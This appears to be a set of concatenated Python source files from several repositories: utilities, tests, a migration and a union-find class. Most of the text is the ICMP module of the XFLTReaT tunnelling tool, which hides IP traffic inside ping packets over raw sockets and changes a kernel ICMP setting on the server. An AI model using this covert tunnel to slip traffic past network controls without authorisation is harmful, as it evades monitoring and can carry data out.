last_mod = _nsdf.dateFromString_(resp.headers.get('Last-Modified'))
if not last_mod:
last_mod = NSDate.date()
return last_mod.timeIntervalSince1970()
### File/URL Reader ###
def read(pth, format=None, encoding=None, cols=None, **kwargs):
"""Returns the contents of a file into a string or format-dependent data
type (with special handling for json and csv files).
The format will either be inferred from the file extension or can be set
explicitly using the `format` arg. Text will be read using the specified
`encoding` or default to UTF-8.
JSON files will be parsed and an appropriate python type will be selected
based on the top-level object defined in the file. The optional keyword
argument `dict` can be set to `adict` or `odict` if you'd prefer not to use
the standard python dictionary for decoded objects.
CSV files will return a list of rows. By default each row will be an ordered
list of column values. If the first line of the file defines column names,
you can call read() with cols=True in which case each row will be a namedtuple
using those names as keys. If the file doesn't define its own column names,
you can pass a list of strings as the `cols` parameter. Rows can be formatted
as column-keyed dictionaries by passing True as the `dict` parameter.
"""
if re.match(r'https?:', pth):
resp = HTTP.get(pth)
resp.raise_for_status()
extension_type = splitext(urlparse(pth).path)[-1]
content_type = resp.headers.get('content-type', extension_type).lower()
for data_t in ['json', 'csv']:
if data_t in content_type:
extension_type = data_t
if binaryish(content_type, format):
fd = BytesIO(resp.content)
else:
if encoding:
resp.encoding = encoding
elif 'charset' not in content_type:
resp.encoding = resp.apparent_encoding
fd = StringIO(resp.text)
else:
enc = encoding or 'utf-8'
extension_type = splitext(pth)[-1].lower()
if binaryish(extension_type, format):
fd = open(os.path.expanduser(pth), 'rb')
else:
fd = open(os.path.expanduser(pth), 'rt', encoding=enc)
if kwargs.get('dict') is True:
kwargs['dict'] = dict
elif kwargs.get('dict') is False:
del kwargs['dict']
dict_type = kwargs.get('dict', dict)
format = (format or extension_type).lstrip('.')
if format=='json':
return json.load(fd, object_pairs_hook=dict_type)
elif format=='csv':
dialect = csv_dialect(fd)
if cols:
if kwargs.get('dict'):
return list(csv_dict(fd, dialect=dialect, cols=cols, dict=dict_type))
else:
return list(csv_tuple(fd, dialect=dialect, cols=cols))
return list(csv_rows(fd, dialect=dialect))
else:
return fd.read()
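# Illustrative usage sketch (not part of the original module); the file names
# are hypothetical:
#   rows = read('results.csv', cols=True)              # list of namedtuples keyed by the header row
#   dicts = read('results.csv', cols=True, dict=True)  # list of per-row dictionaries instead
#   cfg = read('http://example.com/config.json')       # parsed JSON (dict/list)
#   raw = read('chart.png')                            # raw bytes (format inferred from the extension)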
|
tests/build_small_spatialite_db.py | eyeseast/datasette | 5,978 | 12728169 | <reponame>eyeseast/datasette<filename>tests/build_small_spatialite_db.py
import sqlite3
# This script generates the spatialite.db file in our tests directory.
def generate_it(filename):
conn = sqlite3.connect(filename)
# Load the spatialite extension:
conn.enable_load_extension(True)
conn.load_extension("/usr/local/lib/mod_spatialite.dylib")
conn.execute("select InitSpatialMetadata(1)")
conn.executescript("create table museums (name text)")
conn.execute("SELECT AddGeometryColumn('museums', 'point_geom', 4326, 'POINT', 2);")
# At this point it is around 5MB - we can shrink it dramatically by doing this:
conn.execute("delete from spatial_ref_sys")
conn.execute("delete from spatial_ref_sys_aux")
conn.commit()
conn.execute("vacuum")
conn.close()
if __name__ == "__main__":
generate_it("spatialite.db")
|
extra_tests/snippets/unicode_slicing.py | dbrgn/RustPython | 11,058 | 12728187 | def test_slice_bounds(s):
# End out of range
assert s[0:100] == s
assert s[0:-100] == ''
# Start out of range
assert s[100:1] == ''
# Out of range both sides
# This is the behaviour in cpython
# assert s[-100:100] == s
def expect_index_error(s, index):
try:
s[index]
except IndexError:
pass
else:
assert False
unicode_str = "∀∂"
assert unicode_str[0] == "∀"
assert unicode_str[1] == "∂"
assert unicode_str[-1] == "∂"
test_slice_bounds(unicode_str)
expect_index_error(unicode_str, 100)
expect_index_error(unicode_str, -100)
ascii_str = "hello world"
test_slice_bounds(ascii_str)
assert ascii_str[0] == "h"
assert ascii_str[1] == "e"
assert ascii_str[-1] == "d"
# test unicode indexing, made more tricky by hebrew being a right-to-left language
hebrew_text = "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ"
assert len(hebrew_text) == 60
assert len(hebrew_text[:]) == 60
assert hebrew_text[0] == 'ב'
assert hebrew_text[1] == 'ְ'
assert hebrew_text[2] == 'ּ'
assert hebrew_text[3] == 'ר'
assert hebrew_text[4] == 'ֵ'
assert hebrew_text[5] == 'א'
assert hebrew_text[6] == 'ש'
assert hebrew_text[5:10] == 'אשִׁי'
assert len(hebrew_text[5:10]) == 5
assert hebrew_text[-20:50] == 'מַיִם, וְא'
assert len(hebrew_text[-20:50]) == 10
assert hebrew_text[:-30:1] == 'בְּרֵאשִׁית, בָּרָא אֱלֹהִים, '
assert len(hebrew_text[:-30:1]) == 30
assert hebrew_text[10:-30] == 'ת, בָּרָא אֱלֹהִים, '
assert len(hebrew_text[10:-30]) == 20
assert hebrew_text[10:30:3] == 'תבר לִ,'
assert len(hebrew_text[10:30:3]) == 7
assert hebrew_text[10:30:-3] == ''
assert hebrew_text[30:10:-3] == 'אםהֱאּ '
assert len(hebrew_text[30:10:-3]) == 7
assert hebrew_text[30:10:-1] == 'א ,םיִהֹלֱא אָרָּב ,'
assert len(hebrew_text[30:10:-1]) == 20
|
pytorch_blade/torch_blade/algorithm/union_set.py | JamesTheZ/BladeDISC | 328 | 12728242 | # Copyright 2021 The BladeDISC Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class UnionSet:
def __init__(self, num_elems: int):
self._num_elems = num_elems
self._num_sets = num_elems
self._group_id = dict([(g, g) for g in range(0, num_elems)])
def same_group(self, x: int, y: int):
pid_x = self.find(x)
pid_y = self.find(y)
if (pid_x == pid_y):
return True
return False
def find(self, x: int):
assert(x < self._num_elems)
assert(x in self._group_id)
pid = self._group_id[x]
if (pid != self._group_id[pid]):
pid = self.find(pid)
# path compression
self._group_id[x] = pid
return pid
def num_sets(self):
return self._num_sets
def union(self, x: int, y: int):
pid_x = self.find(x)
pid_y = self.find(y)
if (pid_x == pid_y):
return
self._num_sets -= 1
self._group_id[pid_y] = pid_x
def get_groups(self):
groups_dict = dict()
for k in range(0, self._num_elems):
pid = self.find(k)
if pid not in groups_dict:
groups_dict[pid] = list()
groups_dict[pid].append(k)
keys = sorted(groups_dict.keys())
groups = list()
for k in keys:
assert(len(groups_dict[k]) > 0)
groups.append(groups_dict[k])
assert(self._num_sets == len(groups))
return groups
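
if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module): merge a few
    # elements and inspect the resulting groups.
    us = UnionSet(5)
    us.union(0, 1)
    us.union(3, 4)
    assert us.same_group(0, 1)
    print(us.num_sets())    # 3
    print(us.get_groups())  # [[0, 1], [2], [3, 4]]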
|
modules/ICMP.py | androdev4u/XFLTReaT | 315 | 12728247 | <gh_stars>100-1000
# MIT License
# Copyright (c) 2017 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
if "ICMP.py" in sys.argv[0]:
print("[-] Instead of poking around just try: python xfltreat.py --help")
sys.exit(-1)
import socket
import time
import select
import os
import struct
import threading
import random
import subprocess
#local files
import Stateless_module
import encryption
import client
import common
from support.icmp_proto import ICMP_Proto
from support.icmp_proto import ICMP_Client
class ICMP(Stateless_module.Stateless_module):
module_name = "ICMP"
module_configname = "ICMP"
module_description = """ICMP type 8+0 module. Sends ping requests and
responses. Just an ordinary ping tunnel."""
module_os_support = common.OS_LINUX | common.OS_MACOSX | common.OS_WINDOWS | common.OS_FREEBSD
def __init__(self):
super(ICMP, self).__init__()
self.icmp = ICMP_Proto()
self.ICMP_sequence = 0
# identifier lottery
self.ICMP_identifier = int(random.random() * 65535)
# serverport lottery, not like it matters
self.ICMP_fake_serverport = int(random.random() * 65535)
# prefix to make it easier to detect xfl packets
self.ICMP_prefix = "XFL"
self.timeout = 2.0
# if the recv-sent>threshold:
self.TRACKING_THRESHOLD = 50
# then we cut back the difference with adjust:
self.TRACKING_ADJUST = 20
return
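    # Wire format (summarising send()/recv() below): each tunnelled message rides
    # in the payload of an ICMP echo request (client->server) or echo reply
    # (server->client) as "XFL" + 2-byte big-endian length + transformed data,
    # where the transformed plaintext starts with the sender's queue-length byte
    # followed by the control/data channel byte; the ICMP identifier and sequence
    # fields are used to track clients and packet ordering.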
def init_client(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
sequence = additional_data[2]
client_local = ICMP_Client()
client_local.set_ICMP_received_identifier(identifier)
client_local.set_ICMP_received_sequence(sequence)
client_local.set_ICMP_sent_identifier(identifier)
client_local.set_ICMP_sent_sequence(sequence)
client_private_ip = control_message[0:4]
client_public_source_ip = socket.inet_aton(addr[0])
client_public_source_port = addr[1]
# If this private IP is already used, the server removes that client.
# For example: client reconnect on connection reset, duplicated configs
# and yes, this can be used to kick somebody off the tunnel
# close client related pipes
for c in self.clients:
if c.get_private_ip_addr() == client_private_ip:
save_to_close = c
self.clients.remove(c)
if c.get_pipe_r() in self.rlist:
self.rlist.remove(c.get_pipe_r())
found = False
for c in self.packetselector.get_clients():
if c.get_private_ip_addr() == client_private_ip:
found = True
self.packetselector.delete_client(c)
# If client was created but not added to the PacketSelector, then the
# pipes still need to be closed. This could happen when the authenti-
# cation fails or gets interrupted.
if not found:
if self.os_type == common.OS_WINDOWS:
import win32file
try:
win32file.CloseHandle(save_to_close.get_pipe_r())
win32file.CloseHandle(save_to_close.get_pipe_w())
except:
pass
else:
try:
save_to_close.get_pipe_r_fd().close()
save_to_close.get_pipe_w_fd().close()
except:
pass
# creating new pipes for the client
pipe_r, pipe_w = os.pipe()
client_local.set_pipes_fdnum(pipe_r, pipe_w)
client_local.set_pipes_fd(os.fdopen(pipe_r, "r"), os.fdopen(pipe_w, "w"))
# set connection related things and authenticated to True
client_local.set_public_ip_addr(client_public_source_ip)
client_local.set_public_src_port(client_public_source_port)
client_local.set_private_ip_addr(client_private_ip)
client_local.get_encryption().set_module(self.encryption.get_module())
self.encryption = client_local.get_encryption()
if self.encryption.get_module().get_step_count():
# add encryption steps
self.merge_cmh(self.encryption.get_module().get_cmh_struct())
if self.authentication.get_step_count():
# add authentication steps
self.merge_cmh(self.authentication.get_cmh_struct())
client_local.set_initiated(True)
self.clients.append(client_local)
return
def lookup_client_pub(self, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
client_public_ip = socket.inet_aton(addr[0])
for c in self.clients:
if (c.get_public_ip_addr() == client_public_ip) and (c.get_ICMP_received_identifier() == identifier):
return c
return None
def post_authentication_server(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
c = self.lookup_client_pub((addr, identifier))
if c.get_initiated():
c.set_authenticated(True)
self.packetselector.add_client(c)
if c.get_pipe_r() not in self.rlist:
self.rlist.append(c.get_pipe_r())
return True
return False
def remove_initiated_client(self, control_message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
c = self.lookup_client_pub((addr, identifier))
if c:
self.packetselector.delete_client(c)
if c.get_authenticated():
self.rlist.remove(c.get_pipe_r())
self.clients.remove(c)
return
def communication_initialization(self):
self.clients = []
if self.serverorclient:
if self.os_type == common.OS_LINUX:
ps = subprocess.Popen(["cat", "/proc/sys/net/ipv4/icmp_echo_ignore_all"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = ps.communicate()
if stderr:
common.internal_print("Error: deleting default route: {0}".format(stderr), -1)
sys.exit(-1)
self.orig_ieia_value = stdout[0:1]
os.system("echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all")
if self.serverorclient:
self.ICMP_send = self.icmp.ICMP_ECHO_RESPONSE
else:
self.ICMP_send = self.icmp.ICMP_ECHO_REQUEST
return
def modify_additional_data(self, additional_data, serverorclient):
if serverorclient:
c = self.lookup_client_pub(additional_data)
if c:
c.set_ICMP_sent_sequence(additional_data[2])
return additional_data
else:
# increment sequence in additional data
self.ICMP_sequence += 1
return (additional_data[0], additional_data[1], self.ICMP_sequence, additional_data[3])
# check request: generating a challenge and sending it to the server
# in case the answer is that is expected, the targer is a valid server
def do_check(self):
message, self.check_result = self.checks.check_default_generate_challenge()
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_CHECK+message,
(self.server_tuple, self.ICMP_identifier, 0, 0))
return
# start talking to the server
# do authentication or encryption first
def do_hello(self):
# TODO: maybe change this later to push some more info, not just the
# private IP
message = socket.inet_aton(self.config.get("Global", "clientip"))
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_INIT+message,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0))
# Polite signal towards the server to tell that the client is leaving
# Can be spoofed? if there is no encryption. Who cares?
def do_logoff(self):
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_LOGOFF,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0))
return
def do_dummy_packet(self, identifier, sequence):
self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_DUMMY_PACKET,
(self.server_tuple, identifier, sequence, 0))
return
def send(self, channel_type, message, additional_data):
addr = additional_data[0]
identifier = additional_data[1]
sequence = additional_data[2]
queue_length = additional_data[3]
if queue_length < 256:
ql = chr(queue_length)
else:
ql = chr(255)
if channel_type == common.CONTROL_CHANNEL_BYTE:
transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.CONTROL_CHANNEL_BYTE+message, 1)
else:
transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.DATA_CHANNEL_BYTE+message, 1)
common.internal_print("ICMP sent: {0} seq: {1} id: {2}".format(len(transformed_message), sequence, identifier), 0, self.verbosity, common.DEBUG)
packet = self.icmp.create_packet(self.ICMP_send, identifier, sequence,
self.ICMP_prefix+struct.pack(">H", len(transformed_message))+transformed_message)
# WORKAROUND?!
# Windows: It looks like when the buffer fills up the OS does not do
# congestion control, instead throws and exception/returns with
# WSAEWOULDBLOCK which means that we need to try it again later.
# So we sleep 100ms and hope that the buffer has more space for us.
# If it does then it sends the data, otherwise tries it in an infinite
# loop...
while True:
try:
return self.comms_socket.sendto(packet, addr)
except socket.error as se:
if se.args[0] == 10035: # WSAEWOULDBLOCK
time.sleep(0.1)
pass
else:
raise
def recv(self):
message, addr = self.comms_socket.recvfrom(1508)
identifier = struct.unpack("<H", message[24:26])[0]
sequence = struct.unpack(">H", message[26:28])[0]
if message[28:28+len(self.ICMP_prefix)] != self.ICMP_prefix:
return ("", None, None, None, None)
message = message[28+len(self.ICMP_prefix):]
length = struct.unpack(">H", message[0:2])[0]
if (length+2 != len(message)):
common.internal_print("Error length mismatch {0} {1}".format(length, len(message)), -1)
return ("", None, None, None, None)
message = self.transform(self.get_client_encryption((addr, identifier, 0, 0)), message[2:length+2], 0)
queue_length = struct.unpack(">B", message[0:1])[0]
common.internal_print("ICMP read: {0} seq: {1} id: {2}".format(length, sequence, identifier), 0, self.verbosity, common.DEBUG)
return message[1:], addr, identifier, sequence, queue_length
def communication_win(self, is_check):
import win32event
import win32file
import win32api
import pywintypes
import winerror
# event for the socket
hEvent_sock = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(self.comms_socket, hEvent_sock, win32file.FD_READ)
# descriptor list
self.rlist = [self.comms_socket]
# overlapped list
self.olist = [0]
# event list
self.elist = [hEvent_sock]
# message buffer list
self.mlist = [0]
# id of the read object - put in this if it was read
self.ulist = []
if not self.serverorclient and self.tunnel:
# client mode
# objects created for the tunnel and put in the corresponding
# lists
hEvent_pipe = win32event.CreateEvent(None, 0, 0, None) # for reading from the pipe
overlapped_pipe = pywintypes.OVERLAPPED()
overlapped_pipe.hEvent = hEvent_pipe
message_buffer = win32file.AllocateReadBuffer(4096)
self.rlist.append(self.tunnel)
self.olist.append(overlapped_pipe)
self.elist.append(hEvent_pipe)
self.mlist.append(message_buffer)
self.ulist.append(1)
while not self._stop:
try:
if not self.tunnel:
# check or server mode without client only with socket
#message, addr = self.comms_socket.recvfrom(1508)
rc = win32event.WaitForSingleObject(hEvent_sock, int(self.timeout*1000))
if rc == winerror.WAIT_TIMEOUT:
# timed out, just rerun and wait
continue
else:
if self.ulist:
# there is somebody waiting to be read
for idx in self.ulist:
# issuing ReadFile on all not-yet-read mailslots/tunnel handles
hr, _ = win32file.ReadFile(self.rlist[idx], self.mlist[idx], self.olist[idx])
if (hr != 0) and (hr != winerror.ERROR_IO_PENDING):
common.internal_print("UDP ReadFile failed: {0}".format(hr), -1)
raise
self.ulist = []
# waiting to get some data somewhere
rc = win32event.WaitForMultipleObjects(self.elist, 0, int(self.timeout*1000))
if rc == winerror.WAIT_TIMEOUT:
# timed out, just rerun and wait
continue
if rc < 0x80: # STATUS_ABANDONED_WAIT_0
if rc > 0:
# the tunnel or one of the mailslots got signalled
self.ulist.append(rc)
if (self.olist[rc].InternalHigh < 4) or (self.mlist[rc][0:1] != "\x45"): #Only care about IPv4
continue
readytogo = self.mlist[rc][0:self.olist[rc].InternalHigh]
if self.serverorclient:
c = self.lookup_client_priv(readytogo)
if c:
# if the difference between the received and sent sequences is too big
# some routers/firewalls just drop older sequences. If it gets
# too big, we just drop the older ones and use the latest X packets
# this helps with stability.
if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD:
c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST)
# get client related values: identifier and sequence number
identifier = c.get_ICMP_sent_identifier()
sequence = c.get_ICMP_sent_sequence()
# queueing every packet first
c.queue_put(readytogo)
# are there any packets to answer?
if (c.get_ICMP_received_sequence() - sequence) == 0:
continue
else:
request_num = 0
# if there are more packets in the queue than requests we can answer
# then we cap the number of outgoing packets
if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()):
number_to_get = (c.get_ICMP_received_sequence() - sequence)
else:
# send all packets from the queue
number_to_get = c.queue_length()
for i in range(0, number_to_get):
# get first packet
readytogo = c.queue_get()
# is it the last one we are sending now?
if i == (number_to_get - 1):
# if the last one and there is more in the queue
# then we ask for dummy packets
request_num = c.queue_length()
# go packets go!
self.send(common.DATA_CHANNEL_BYTE, readytogo,
((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()),
identifier, sequence + i + 1, request_num))
sequence = (sequence + i + 1) % 65536
c.set_ICMP_sent_sequence(sequence)
else:
# there is no client with that IP
common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG)
continue
else:
if self.authenticated:
# whatever we have from the tunnel, just encapsulate it
# and send it out
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.send(common.DATA_CHANNEL_BYTE, readytogo,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #??
else:
common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG)
continue
if rc == 0:
# socket got signalled
message, addr, identifier, sequence, queue_length = self.recv()
if len(message) == 0:
continue
c = None
if self.serverorclient:
self.authenticated = False
c = self.lookup_client_pub((addr, 0))
if c:
c.set_ICMP_received_identifier(identifier)
# packets do not always arrive in order
# if a higher sequence has arrived already, then we
# do not modify
# 16bit integer MAX could be a bit tricky, a
# threshold had to be introduced to make it
# fail safe. Hacky but should work.
ICMP_THRESHOLD = 100
if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)):
c.set_ICMP_received_sequence(sequence)
else:
if queue_length:
common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG)
for i in range(queue_length+10):
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier,
self.ICMP_sequence)
if common.is_control_channel(message[0:1]):
if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)):
continue
else:
self.stop()
break
if c:
self.authenticated = c.get_authenticated()
if self.authenticated:
try:
self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):])
except OSError as e:
print(e)
except win32api.error as e:
common.internal_print("UDP Exception: {0}".format(e), -1)
except socket.error as se:
if se.args[0] == 10054: # port is unreachable
common.internal_print("Server's port is unreachable: {0}".format(se), -1)
self._stop = True
return True
def communication_unix(self, is_check):
sequence = 0
identifier = 0
self.rlist = [self.comms_socket]
if not self.serverorclient and self.tunnel:
self.rlist = [self.tunnel, self.comms_socket]
wlist = []
xlist = []
while not self._stop:
try:
readable, writable, exceptional = select.select(self.rlist, wlist, xlist, self.timeout)
except select.error, e:
common.internal_print("select.error: %r".format(e), -1)
break
try:
if not readable:
if is_check:
raise socket.timeout
if not self.serverorclient:
if self.authenticated:
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier, self.ICMP_sequence)
common.internal_print("Keep alive sent", 0, self.verbosity, common.DEBUG)
continue
for s in readable:
if (s in self.rlist) and not (s is self.comms_socket):
message = self.packet_reader(s, True, self.serverorclient)
while True:
if (len(message) < 4) or (message[0:1] != "\x45"): #Only care about IPv4
break
packetlen = struct.unpack(">H", message[2:4])[0] # IP Total length
if packetlen > len(message):
message += self.packet_reader(s, False, self.serverorclient)
readytogo = message[0:packetlen]
message = message[packetlen:]
if self.serverorclient:
c = self.lookup_client_priv(readytogo)
if c:
# if the difference between the received and sent sequences is too big
# some routers/firewalls just drop older sequences. If it gets
# too big, we just drop the older ones and use the latest X packets
# this helps with stability.
if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD:
c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST)
# get client related values: identifier and sequence number
identifier = c.get_ICMP_sent_identifier()
sequence = c.get_ICMP_sent_sequence()
# queueing every packet first
c.queue_put(readytogo)
# are there any packets to answer?
if (c.get_ICMP_received_sequence() - sequence) == 0:
continue
else:
request_num = 0
# if there are more packets in the queue than requests we can answer
# then we cap the number of outgoing packets
if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()):
number_to_get = (c.get_ICMP_received_sequence() - sequence)
else:
# send all packets from the queue
number_to_get = c.queue_length()
for i in range(0, number_to_get):
# get first packet
readytogo = c.queue_get()
# is it the last one we are sending now?
if i == (number_to_get - 1):
# if the last one and there is more in the queue
# then we ask for dummy packets
request_num = c.queue_length()
# go packets go!
self.send(common.DATA_CHANNEL_BYTE, readytogo,
((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()),
identifier, sequence + i + 1, request_num))
sequence = (sequence + i + 1) % 65536
c.set_ICMP_sent_sequence(sequence)
else:
# there is no client with that IP
common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG)
continue
else:
if self.authenticated:
# whatever we have from the tunnel, just encapsulate it
# and send it out
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.send(common.DATA_CHANNEL_BYTE, readytogo,
(self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #??
else:
common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG)
continue
if s is self.comms_socket:
message, addr, identifier, sequence, queue_length = self.recv()
if len(message) == 0:
continue
c = None
if self.serverorclient:
self.authenticated = False
c = self.lookup_client_pub((addr, identifier))
if c:
c.set_ICMP_received_identifier(identifier)
# packets do not always arrive in order
# if a higher sequence has arrived already, then we
# do not modify
# 16bit integer MAX could be a bit tricky, a
# threshold had to be introduced to make it
# fail safe. Hacky but should work.
ICMP_THRESHOLD = 100
if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)):
c.set_ICMP_received_sequence(sequence)
else:
if queue_length:
common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG)
for i in range(queue_length+10):
self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536
self.do_dummy_packet(self.ICMP_identifier,
self.ICMP_sequence)
if common.is_control_channel(message[0:1]):
if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)):
continue
else:
self.stop()
break
if c:
self.authenticated = c.get_authenticated()
if self.authenticated:
try:
self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):])
except OSError as e:
print(e)
except (socket.error, OSError):
raise
if self.serverorclient:
self.comms_socket.close()
break
except:
print("another error")
raise
return
def serve(self):
server_socket = None
self.serverorclient = 1
try:
common.internal_print("Starting module: {0} on {1}".format(self.get_module_name(), self.config.get("Global", "serverbind")))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if (self.os_type == common.OS_WINDOWS) or (self.os_type == common.OS_MACOSX):
common.internal_print("This module can be run in client mode only on this operating system.", -1)
self.cleanup()
return
self.comms_socket = server_socket
self.authenticated = False
self.communication_initialization()
self.communication(False)
except KeyboardInterrupt:
self.cleanup()
return
self.cleanup()
return
def connect(self):
try:
common.internal_print("Starting client: {0}".format(self.get_module_name()))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if self.os_type == common.OS_WINDOWS:
# this should give back the default route interface IP
default_host_ip = socket.gethostbyname(socket.gethostname())
server_socket.bind((default_host_ip, 0))
self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport)
self.comms_socket = server_socket
self.serverorclient = 0
self.authenticated = False
self.communication_initialization()
self.do_hello()
self.communication(False)
except KeyboardInterrupt:
self.do_logoff()
self.cleanup()
raise
self.cleanup()
return
def check(self):
try:
common.internal_print("Checking module on server: {0}".format(self.get_module_name()))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
if self.os_type == common.OS_WINDOWS:
# this should give back the default route interface IP
default_host_ip = socket.gethostbyname(socket.gethostname())
server_socket.bind((default_host_ip, 0))
self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport)
self.comms_socket = server_socket
self.serverorclient = 0
self.authenticated = False
self.communication_initialization()
self.do_check()
self.communication(True)
except KeyboardInterrupt:
self.cleanup()
raise
except socket.timeout:
common.internal_print("Checking failed: {0}".format(self.get_module_name()), -1)
self.cleanup()
return
def cleanup(self):
common.internal_print("Shutting down module: {0}".format(self.get_module_name()))
if self.serverorclient:
if self.os_type == common.OS_LINUX:
os.system("echo {0} > /proc/sys/net/ipv4/icmp_echo_ignore_all".format(self.orig_ieia_value)) #???
try:
self.comms_socket.close()
except:
pass
try:
os.close(self.tunnel)
except:
pass
|
test/tests/python-sqlite3/container.py | sortie/official-images | 5,326 | 12728253 |
import sqlite3
ver = sqlite3.sqlite_version
con = sqlite3.connect(':memory:', 1, sqlite3.PARSE_DECLTYPES, None)
cur = con.cursor()
cur.execute('CREATE TABLE test (id INT, txt TEXT)')
cur.execute('INSERT INTO test VALUES (?, ?)', (42, 'wut'))
cur.execute('SELECT * FROM test')
assert(cur.fetchall() == [(42, 'wut')])
cur.execute('DROP TABLE test')
con.close()
|
src/nsupdate/main/migrations/0006_auto_20141121_1057.py | mirzazulfan/nsupdate.info | 774 | 12728256 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0005_auto_20141121_1053'),
]
operations = [
migrations.AddField(
model_name='host',
name='staleness',
field=models.PositiveIntegerField(default=0, verbose_name='staleness'),
preserve_default=True,
),
migrations.AddField(
model_name='host',
name='staleness_notification_timestamp',
field=models.DateTimeField(null=True, verbose_name='staleness notification time', blank=True),
preserve_default=True,
),
]
|
discomll/tests/chunk_testdata.py | romanorac/discomll | 103 | 12728260 |
def chunk_testdata():
import discomll
from disco import ddfs
path = "/".join(discomll.__file__.split("/")[:-2] + ["discomll", "datasets", ""])
tags_chunk = ["test:breast_cancer_cont", "test:breast_cancer_cont_test", "test:breast_cancer_disc",
"test:breast_cancer_disc_test", "test:ex3", "test:ex3_test", "test:ex4", "test:iris",
"test:iris_test", "test:regression_data1", "test:regression_data2", "test:regression_data_test1",
"test:regression_data_test2"]
filenames_chunk = ["breast_cancer_wisconsin_cont.txt", "breast_cancer_wisconsin_cont_test.txt",
"breast_cancer_wisconsin_disc.txt", "breast_cancer_wisconsin_disc_test.txt", "ex3.txt",
"ex3_test.txt", "ex4.txt", "iris.txt", "iris_test.txt", "regression_data1.txt",
"regression_data2.txt", "regression_data_test1.txt", "regression_data_test2.txt"]
ddfs = ddfs.DDFS()
for i in range(len(tags_chunk)):
